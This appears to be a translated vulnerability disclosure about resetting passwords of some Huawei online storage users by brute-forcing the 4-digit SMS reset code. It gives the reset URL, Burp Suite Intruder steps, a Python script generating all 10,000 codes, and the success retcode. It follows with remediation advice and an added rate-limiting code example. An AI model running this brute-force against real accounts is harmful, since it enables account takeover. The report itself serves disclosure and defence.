Password modification for some users of Huawei online storage

Source: Internet
Author: User

The passwords of some Huawei online storage users, namely those who have bound a mobile phone number (users can bind a phone in their settings after registration), can be modified by a third party. The attack does not require the target's mobile phone number; only the user name (usually the e-mail address or the mobile phone number) needs to be known.

The password retrieval page is http://dbank.vmall.com/netdisk/resetpassword.html?v=2.9.41372210600917#inputAccount. Enter the target user name, choose "Reset Password through password protection mobile phone", and intercept the resulting GET request with Burp Suite. The r parameter of that request carries the mobile verification code, so set it as the variable (payload position). The mobile verification code is known to be a combination of four digits, so a Python script can generate the dictionary.

    # Generates every 4-digit numeric code (0000 to 9999) into dict.txt.
    # Only digits are used; the letter ranges in the original were commented out.
    f = open("dict.txt", 'w+')
    chars = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
    # 'a'..'z' and 'A'..'Z' were commented out in the original script
    base = len(chars)   # 10
    end = base ** 4     # 10000 combinations
    for i in range(0, end):
        n = i
        ch0 = chars[n % base]   # least significant digit
        n //= base              # integer division (Python 2 '/' behaved this way)
        ch1 = chars[n % base]
        n //= base
        ch2 = chars[n % base]
        n //= base
        ch3 = chars[n % base]   # most significant digit
        print(i, ch3, ch2, ch1, ch0)
        f.write(ch3 + ch2 + ch1 + ch0 + '\n')
    f.close()


Start Intruder. The 10,000 requests complete in a few minutes. Note that the length of the response stays the same; only the retcode changes: 0002 is returned when the password modification fails and 0000 when it succeeds. This does not hinder the attack. Then log on with the new password. (If Huawei online storage stops responding to the local host, wait a minute or two or switch to another computer.)

Solution: this password retrieval logic is convenient for users but carries security risks. Suggestions:
1. Use a longer verification code; six digits is the usual length.
2. Display the new-password page only after the correct verification code has been entered, and make each verification code valid only once.
3. Restrict the number of verification requests or incorrect verification codes a user may submit, for example by adding an image verification code.
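The following is an added example, not code from the report or from Huawei, showing what the three suggestions look like on the server side: a six-digit code drawn from a cryptographic source, a lifetime, a cap on wrong guesses after which the code is voided, and single use on success. The class and constant names (ResetCodeStore, CODE_DIGITS, MAX_ATTEMPTS, TTL_SECONDS) and the limits are assumptions chosen for illustration. The helper at the end counts how many wrong guesses a pending code survives, which is the quantity the 10,000-request Intruder run above relied on being unbounded.

```python
import hmac
import secrets
import time
from dataclasses import dataclass

# Assumed limits for this illustration (not values from the report).
CODE_DIGITS = 6       # 10**6 possibilities instead of the 10**4 of a 4-digit code
MAX_ATTEMPTS = 5      # wrong guesses tolerated before the code is voided
TTL_SECONDS = 300     # lifetime of an issued code


@dataclass
class PendingReset:
    code: str
    issued_at: float
    attempts: int = 0


class ResetCodeStore:
    """Issues single-use reset codes and verifies guesses with an attempt cap."""

    def __init__(self, clock=time.time):
        self._clock = clock      # injectable so tests can control time
        self._pending = {}       # account -> PendingReset

    def issue(self, account: str) -> str:
        # secrets.randbelow is unpredictable; zero-pad so leading zeros survive.
        code = f"{secrets.randbelow(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"
        self._pending[account] = PendingReset(code=code, issued_at=self._clock())
        # In a real service the code goes to the SMS gateway only, never into
        # the HTTP response; it is returned here so the flow can be exercised.
        return code

    def has_pending(self, account: str) -> bool:
        return account in self._pending

    def verify(self, account: str, guess: str) -> bool:
        entry = self._pending.get(account)
        if entry is None:
            return False                       # nothing pending or already consumed
        if self._clock() - entry.issued_at > TTL_SECONDS:
            del self._pending[account]         # expired: must request a new code
            return False
        entry.attempts += 1                    # every guess costs an attempt
        if hmac.compare_digest(entry.code, guess):   # constant-time comparison
            del self._pending[account]         # single use: consumed on success
            return True
        if entry.attempts >= MAX_ATTEMPTS:
            del self._pending[account]         # cap reached: the code is voided
        return False


def guesses_until_voided(store: ResetCodeStore, account: str, wrong_guess: str) -> int:
    """Count wrong guesses the store accepts before it voids the pending code."""
    n = 0
    while store.has_pending(account):
        store.verify(account, wrong_guess)
        n += 1
    return n


if __name__ == "__main__":
    store = ResetCodeStore()
    code = store.issue("user@example.com")     # constructed account name
    print("wrong guesses tolerated:", guesses_until_voided(store, "user@example.com", "-"))
    print("original code still valid:", store.verify("user@example.com", code))
```

With the cap in place an exhaustive run against the code is cut off after MAX_ATTEMPTS guesses regardless of code length; the longer code and the expiry reduce the chance that the few permitted guesses succeed, and the single-use rule means an intercepted code cannot be replayed after the legitimate user has used it.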
